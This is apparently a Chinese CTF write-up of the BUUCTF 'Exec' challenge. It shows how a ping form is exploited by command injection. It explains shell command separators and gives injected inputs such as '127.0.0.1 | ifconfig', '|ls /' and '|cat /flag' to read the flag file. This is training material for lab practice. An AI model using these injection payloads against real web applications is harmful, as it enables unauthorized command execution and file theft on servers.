BUUCTF-Web-[ACTF2020 新生赛]Exec
打开题目环境,如下所示
![BUUCTF-Web-[ACTF2020 新生赛]Exec - 图1](/uploads/projects/bug132294@lmmitx/68370075f0290fa874462e8054a96cfa.png)
根据题目名称Exec及该界面,猜测应该是命令注入漏洞
输入127.0.0.1测试,输出如下:
PING 127.0.0.1 (127.0.0.1): 56 data bytes
根据命令连接符特征
命令拼接符|、||、&、&&的区别:&:无论左边是false还是true,右边都执行&&:具有短路效果,左边是false,右边不执行。|:无论左边是false还是true,右边都会执行||:具有短路效果,左边是true,右边不执行。;: 前后都执行,无论前面真假,同&,(linux也有)
构造以下语句测试
127.0.0.1 | ifconfig
发现ifconfig命令执行
![BUUCTF-Web-[ACTF2020 新生赛]Exec - 图2](/uploads/projects/bug132294@lmmitx/ebaa5a81b155fba7a830e24e02b43f3f.png)
看看根目录下文件
127.0.0.1 |ls /
![BUUCTF-Web-[ACTF2020 新生赛]Exec - 图3](/uploads/projects/bug132294@lmmitx/392c132bbc7b0bcd98c91ea5bd1f8d81.png)
查看flag文件
127.0.0.1 |cat /flag
获得flag
![BUUCTF-Web-[ACTF2020 新生赛]Exec - 图4](/uploads/projects/bug132294@lmmitx/f8e6264297d039520cfbc0cdb729ea0f.png)
